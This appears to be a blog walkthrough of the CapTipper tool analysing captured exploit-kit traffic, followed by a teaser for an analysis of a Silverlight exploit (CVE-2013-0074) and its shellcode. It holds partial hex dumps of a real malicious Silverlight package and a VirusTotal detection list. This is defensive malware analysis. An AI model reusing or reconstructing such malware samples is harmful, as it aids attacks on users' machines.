00A0   A5 59 5F 7F 43 98 39 43 E8 90 69 C7 9D 84 3A 9C    .Y_.C.9C..i...:.
00B0   36 1D E6 12 F8 EB 03 EA F4 59 2A FD 71 9F 15 DB    6........Y*.q...
00C0   4B F3 C3 C4 4C 70 11 A1 19 25 C8 79 6E 4A 5E 4C    K...Lp...%.ynJ^L
00D0   10 F5 A2 F9 1A E0 18 42 9D 87 9D 39 12 39 57 89    .......B...9.9W.
00E0   CF EF 41 78 2E 57 88 C9 A5 BA F2 0E FC E0 5E B5    ..Ax.W........^.
00F0   66 0C B4 7E A2 0B C4 D7 65 F8 12 57 98 58 16 16    f..~....e..W.X..

Now let's take a look at the second one:

CT> hexdump 13
Displaying hexdump of object 13 (00015d76.swf) body [256 bytes]:

0000   50 4B 03 04 14 00 00 08 08 00 81 7A 5D 45 6F 8B    PK.........z]Eo.
0010   BE 6C D2 00 00 00 6B 01 00 00 10 00 00 00 41 70    .l....k.......Ap
0020   70 4D 61 6E 69 66 65 73 74 2E 78 61 6D 6C 85 8F    pManifest.xaml..
0030   C1 4A 03 31 10 86 EF 42 DF 21 E4 01 92 50 6A 95    .J.1...B.!...Pj.
0040   C5 2D 14 F4 2A A5 8A F7 98 9D DA 60 66 12 32 69    .-..*......`f.2i
0050   9B 7D 36 0F 3E 92 AF E0 D6 A2 EC 61 C1 EB 37 FF    .}6.>......a..7.
0060   C7 C7 7C 7D 7C DE DD 43 0A B1 47 A0 22 2A 06 E2    ..|}|..C..G."*..
0070   56 EE 4B 49 8D D6 EC F6 80 96 15 7A 97 23 C7 5D    V.KI.......z.#.]
0080   51 2E A2 76 C1 0F 53 3D 37 E6 46 77 7F AA BC B8    Q..v..S=7.Fw....
0090   4D FD C7 3E 79 DA D5 B3 BC D4 D5 62 90 E2 81 4A    M..>y......b...J
00A0   EE 37 D1 53 59 33 03 BE 86 BE 95 15 F2 D1 A2 25    .7.SY3.........%
00B0   48 B0 00 7A F7 E3 D5 73 9F A0 95 96 BB 37 EE D4    H..z...s.....7..
00C0   3A 25 29 B6 07 2A 1E E1 05 32 FB 48 AD 5C 28 A3    :%)..*...2.H.\(.
00D0   AE CD ED 7C A9 8C 5C CD AE 84 18 7D A8 36 36 17    ...|..\....}.66.
00E0   FE A1 03 FF 2D 9E A1 A8 CD A3 45 98 8A 3F C5 43    ....-.....E..?.C
00F0   76 13 17 D5 85 E1 01 7D 69 E8 89 C8 18 AE BE 01    v......}i.......

Interesting... This file starts with the 'PK' magic bytes, meaning it's actually a zip file, which can be a few things.

Let's take a look at the files inside the zip using the command 'ziplist'

CT> ziplist 13
 2 Files found in zip object 13 (00015d76.swf):

 [Z] 1 : AppManifest.xaml
 [Z] 2 : xervamanepe4enki.dll

Well it seems that this is actually a Silverlight exploit.
Now we can dump it with it's real extension:

CT> dump 13 c:\NuclearFiles\Silver_exp.xap
 Object 13 written to c:\NuclearFiles\Silver_exp.xap

We can also send the file's md5 hash to VirusTotal to see if it is recognized by any of the Anti-Virus providers, using the command 'vt'.
These requires a VirusTotal public API key.
(The file itself isn't sent to VT, only the hash of the file is sent!)

CT> vt 13
 VirusTotal result for object 13 (00015d76.swf):

 Detection: 37/56
 Last Analysis Date: 2014-12-11 13:15:33
 Report Link:

 Scan Result:
        MicroWorld-eScan        Trojan.GenericKD.1962112      20141211
        nProtect        Trojan.GenericKD.1962112        2014-12-11.01   20141211
        CAT-QuickHeal   Trojan.Generic.r3       14.00   20141210
        McAfee  RDN/Generic Exploit!1ns       20141211
        Malwarebytes    Trojan.Agent        20141211
        VIPRE   Trojan.Win32.Generic!BT 35624   20141211
        K7AntiVirus     Exploit ( 004b06661 )   9.186.14309     20141211
        K7GW    Exploit ( 004b06661 )   9.186.14308     20141211
        Agnitum Exploit.CVE-2013-0074! 20141210
        F-Prot  W32/CVE130074.I       20141211
        Symantec        Trojan.Gen.2    20141.1.0.330   20141211
        Norman  CVE-2013-0074.D 7.04.04 20141211
        TotalDefense    Win32/Tnega.DPSQOR      37.0.11324      20141211
        TrendMicro-HouseCall    Suspicious_GEN.F47V1112 9.700.0.1001    20141211
        Avast   Win32:Malware-gen       8.0.1489.320    20141211
        ClamAV  SILVERLIGHT.Exploit.Nuclear        20141211
        BitDefender     Trojan.GenericKD.1962112        7.2     20141211
        NANO-Antivirus  Exploit.Win32.CVE20130074.dikfyh    20141211
        Ad-Aware        Trojan.GenericKD.1962112      20141211
        Sophos  Mal/Generic-S   4.98.0  20141211
        Comodo  UnclassifiedMalware     20333   20141211
        F-Secure        Trojan.GenericKD.1962112        11.0.19100.45   20141211
        DrWeb   Exploit.CVE2013-0074.36     20141211
        McAfee-GW-Edition       RDN/Generic Exploit!1ns v2014.2 20141211
        Emsisoft        Trojan.GenericKD.1962112 (B)       20141211
        Cyren   W32/CVE130074.MCZQ-2806 20141211
        Avira   EXP/Silverlight.Gen2     20141211
        Antiy-AVL       Trojan/Win32.SGeneric 20141211
        Microsoft       Exploit:MSIL/CVE-2013-0074.F    1.11202 20141211
        GData   Trojan.GenericKD.1962112        24      20141211
        ALYac   Exploit.CVE-2013-0074 20141211
        AVware  Trojan.Win32.Generic!BT        20141211
        Panda   Exploit/CVE-2013-0074 20141211
        ESET-NOD32      a variant of Win32/Exploit.CVE-2013-0074.BZ     10861   20141211
        Ikarus  Exploit.CVE-2013-0074   T3.      20141211
        AVG     Exploit_c.ABKR     20141211
        Baidu-International     Trojan.Win32.CVE-2013-0074.bBZ     20141211

We notice that most of the Anti-Viruses detected this file as malicious, while some even provided the exploit CVE (2013-0074)
  • If you don't have a VirusTotal public API key, you can use the command 'hashes', and manually send the hash to VirusTotal.


CapTipper was written by Omri Herscovici
Twitter: @omriher

Please open an issue for bugs.
I would be happy to accept suggestions and feedback to my mail :)

To do (Added among other things to CapTipper v0.2):
  • File Identification
  • Regex Search
  • PE info

CapTipper can be found at GitHub:

Sunday, January 11, 2015

Diving into a Silverlight Exploit and Shellcode – Analysis and Techniques

by Omri Herscovici & Liran Englender

From our company's blog (Check Point Software Technologies):

In recent years, exploit-kits have become one of the most common platforms for malware distribution. 
One of the exploits coming from Infinity exploit-kit exploits a security vulnerability in Microsoft Silverlight.

Compared to other technologies like Java, PDF, Flash, etc. – Silverlight exploits are less common. Just to get a rough feeling, according to, from 2010 to 2014, 15 vulnerabilities were reported for Microsoft Silverlight , while Adobe Acrobat Reader had 268 vulnerabilities, Adobe Flash Player had 321 vulnerabilities; Microsoft Internet Explorer had 392 vulnerabilities and Java with at least 358 vulnerabilities. However, Microsoft Silverlight exploits, specifically CVE-2013-0074, are still delivered in active and well known exploit kits.

The blog post, including analysis PDF is availble here:

Analysis PDF:

Infinity EK Payload Decrypter Script: